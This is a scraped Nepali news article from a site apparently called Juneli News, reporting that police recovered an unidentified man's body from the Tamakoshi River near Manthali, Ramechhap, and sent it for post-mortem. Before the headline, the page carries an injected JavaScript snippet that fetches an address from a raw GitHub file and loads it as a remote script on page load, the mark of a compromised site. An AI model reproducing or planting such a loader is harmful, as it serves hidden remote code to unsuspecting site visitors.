;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); तामाकोशी नदीमा भेटिएको ब्यबारिशे शव कसको हो ? – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • तामाकोशी नदीमा भेटिएको ब्यबारिशे शव कसको हो ?
दुर्घटना/अपराध

तामाकोशी नदीमा भेटिएको ब्यबारिशे शव कसको हो ?

फागुन ०६

रामेछाप । रामेछापको मन्थली नगरपालिका वडा नं.१ एयरपोर्ट नजिकै तामाकोशी नदीमा मृत अवस्थापा शव फेला परेको छ । आज अपरान्ह् ४ : ३५ बजेको समयमा मंगोलियन अनुहारको देखिने शव फेला परेको हो ।

शवको प्रकृति हेर्दा एक दिन अघिको जस्तो देखिएको छ । रातो ज्याकेट,निलो ट्रयाक लगाएको अंन्दाजी ५०/५५ वर्षका पुरुषको शव फेला परेको भनि स्थानियबाट खबर प्राप्त हुनसाथ जिल्ला प्रहरी कार्यालय रामेछाप मन्थलीबाट प्रहरी निरीक्षकको कमाण्डमा मुचुल्का सहित १० जनाको टोली र सशस्त्र प्रहरी बल नेपाल आश्रित गुल्म रामेछाप मन्थलीबाट सशस्त्र पहरी निरीक्षकको कमाण्डमा १५ जनाको टोली घटनास्थरमा पुगि शवलाई तामाकोशी नदिबाट निकाली मुचुल्का कार्य भईरहेको प्रहरीले जनाएको छ ।

मृतकको  नामथर खुलेको पत्ता लागेको छैन् । अहिले शवको पोष्टमाटमको लागि प्रथामिक स्वास्थ्य केन्द्र मनथली पठाइएको जिल्ला प्रहरीले जनाएको छ ।

 

फेसबुक प्रतिक्रियाहरु